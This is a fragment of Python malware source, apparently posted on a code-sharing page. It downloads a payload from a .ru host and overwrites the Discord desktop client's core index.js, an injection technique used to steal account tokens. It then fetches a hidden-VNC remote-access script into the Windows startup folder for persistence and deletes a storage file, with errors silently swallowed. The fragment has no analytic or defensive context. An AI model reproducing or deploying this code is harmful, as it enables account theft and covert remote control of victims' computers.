| pass | |
| try: | |
| response = requests.get("https://1312services.ru/discordinjection") | |
| content = response.text | |
| localappdata = os.getenv('LOCALAPPDATA') | |
| base_path = os.path.join(localappdata, 'Discord') | |
| app_version_dir = next(d for d in os.listdir(base_path) if d.startswith('app-')) | |
| core_version_dir = next(d for d in os.listdir(os.path.join(base_path, app_version_dir, 'modules')) if d.startswith('discord_desktop_core-')) | |
| core_path = os.path.join(base_path, app_version_dir, 'modules', core_version_dir, 'discord_desktop_core') | |
| file_path = os.path.join(core_path, 'index.js') | |
| license_path = os.path.join(core_path, 'license.txt') | |
| with open(file_path, 'w') as file: | |
| file.write(content) | |
| with open(license_path, 'w') as license_file: | |
| license_file.write(userid) | |
| except: | |
| pass | |
| try: | |
| URL = "https://1312services.ru/hvnc" | |
| r = requests.get(URL) | |
| with open(os.path.join(STARTUP_PATH, "hvnc.py"), "wb") as f: | |
| f.write(r.content) | |
| except: pass | |
| try: | |
| os.remove(STORAGE_PATH) | |
| except: pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment